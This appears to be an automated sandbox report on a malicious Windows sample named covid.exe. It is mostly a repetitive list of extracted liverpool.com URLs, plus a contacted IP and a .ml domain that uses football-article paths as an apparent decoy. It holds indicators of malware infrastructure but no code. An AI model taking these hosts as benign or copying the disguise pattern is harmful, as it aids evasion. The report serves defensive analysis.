    https://www.liverpool.com/all-about/premier-leaguecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/liverpool-fc-news/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
      		high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmpfalse
        		high
        https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
          		high
          https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
            		high
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://reachplc.hub.loginradius.com&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		low
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pngcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://s2-prod.liverpool.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpfalse
              		high
              https://i2-prod.liverpool.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://felix.data.tm-awx.com/felix.min.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/ozan-kabakcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://s2-prod.mirror.co.uk/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/champions-leaguecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/curtis-jonescovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/all-about/steven-gerrardcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://schema.org/NewsArticlecovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                		high
                https://www.liverpool.com/schedule/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://schema.org/BreadcrumbListcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                  		high
                  https://securepubads.g.doubleclick.net/tag/js/gpt.jscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    		high
                    http://ocsp.sectigo.com041c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://s2-prod.liverpool.com/covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://felix.data.tm-awx.com/ampconfig.json&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://schema.org/ListItemcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      		high
                      https://www.liverpool.com/all-about/georginio-wijnaldumcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://mab.data.tm-awx.com/rhs&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://felix.data.tm-awx.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/all-about/andrew-robertsoncovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://sectigo.com/CPS0C41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://sectigo.com/CPS0D41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/all-about/transferscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://reach-id.orbit.tm-awx.com/analytics.js.gzcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://github.com/ded/script.jscovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        		high
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://quantcast.mgr.consensu.orgcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.220.147
                        		mmwrlridbhmibnr.mlUnited States
                        		13335CLOUDFLARENETUSfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:393947
                        Start date:20.04.2021
                        Start time:22:58:20
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:covid.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:37
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal68.evad.winEXE@15/17@1/2
                        EGA Information:
                        • Successful, ratio: 75%
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.8%)
                        • Quality average: 83%
                        • Quality standard deviation: 25.9%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 204.79.197.200, 13.107.21.200, 20.50.102.62, 104.43.139.144, 23.54.113.53, 205.185.216.10, 205.185.216.42, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.254.96.93, 20.54.26.129, 52.251.11.100
                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        22:59:57API Interceptor1x Sleep call for process: covid.exe modified
                        23:00:13API Interceptor68x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        172.67.220.1478TkFgL94vo.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4230C74ABAEB3870FA9EAF5AC5F71FD3.html
                        List.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
